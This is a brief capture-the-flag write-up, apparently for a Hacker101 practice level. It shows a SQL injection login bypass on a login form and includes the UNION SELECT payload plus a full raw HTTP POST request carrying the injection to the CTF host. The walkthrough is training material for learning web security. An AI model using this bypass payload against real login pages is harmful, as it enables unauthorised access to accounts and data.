1) Go to Login Page

<website>/login

2) Enter Input

username: '

password: *

Click login

3) Analye error for SQL Injection


4) Attack Beign

Username:

SELECT password FROM admins WHERE username ='' UNION SELECT 'random' AS PASSWORD#'

Password:
random

5) After Login Click Private Page
you may find flag


POST /login HTTP/2
Host: b583ad39d6069e1aaaf18a4d25458151.ctf.hacker101.com
Content-Length: 83
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://b583ad39d6069e1aaaf18a4d25458151.ctf.hacker101.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://b583ad39d6069e1aaaf18a4d25458151.ctf.hacker101.com/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

username=user' UNION SELECT "pvd" AS password FROM admins WHERE '1'='1&password=pvd
